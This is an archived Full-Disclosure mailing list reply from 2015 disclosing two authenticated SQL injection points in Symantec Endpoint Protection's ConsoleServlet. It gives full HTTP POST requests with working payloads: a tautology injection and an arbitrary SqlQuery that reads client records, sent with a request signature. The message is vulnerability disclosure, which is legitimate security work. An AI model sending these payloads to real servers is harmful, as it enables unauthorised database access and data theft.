lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <55BF4E5C.4040404@code-white.com>
Date: Mon, 3 Aug 2015 13:19:56 +0200
From: Markus Wulftange <markus.wulftange@...e-white.com>
To: Brandon Perry <bperry.volatile@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Symantec Endpoint Protection

Hi Brandon,

we found two injection points. One in the BinaryFileHandler class:

    POST /servlet/ConsoleServlet HTTP/1.1
    Host: 192.168.40.133:8443
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 51
    Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175

    ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1

And one in the ExpRecordHandler class:

    POST /servlet/ConsoleServlet HTTP/1.1
    Host: 192.168.40.133:8443
    Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175;
REQUESTSIG=09E0C480920F594CBD036BD07DC9A0B13198C99E8AFD93C83A2174710122381CD74369B6A1F2A53CA3121005A65062406DCDDBDCADCE182A532F8D1C47DCC6730CA872CA488D26A8A9E0CF296B99FEC0165F757A486DC66D28012BDD15C4C0F151AFF64A8F4724161C26C2D820D3BB14C248C0E748852BE52CBEE7CC5C04E5E26B415AD471A2FD03E4151798DE7021B8

    Content-Type: application/x-www-form-urlencoded
    Content-Length: 329


ActionType=ExpRecord&ObjectType=SemClient&SqlQuery=SELECT+@@version+AS+CLIENT_ID,DOMAIN_ID,GROUP_ID,GROUP_IS_OU,OU_GUID,POLICY_MODE,COMPUTER_ID,HARDWARE_KEY,COMPUTER_NAME,COMPUTER_DOMAIN_NAME,DESCRIPTION,USER_NAME,FULL_NAME,USER_DOMAIN_NAME,HASH,PIN_MARK,EXTRA_FEATURE,CREATOR,CREATION_TIME,USN,TIME_STAMP,DELETED+from+SEM_CLIENT

Both require authentication. The latter does also require a request
signature REQUESTSIG, which is based on the requested parameters and a
hard-coded key.


-- 
Markus Wulftange
Senior Penetration Tester

Code White GmbH
Magirus-Deutz-Straße 18
89077 Ulm

E-Mail markus.wulftange@...e-white.com
PGP    C6D6 C18B BAB9 0089 6942 213D 7772 8552 E9F8 6F39

http://www.code-white.com

Code White GmbH
Sitz und Registergericht/Domicile and Register Court: Stuttgart,
HRB-Nr./Commercial Register No.: 749152
Geschäftsführung/Management: Dr. Helmut Mahler, Andreas Melzner, Lüder
Sachse


Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ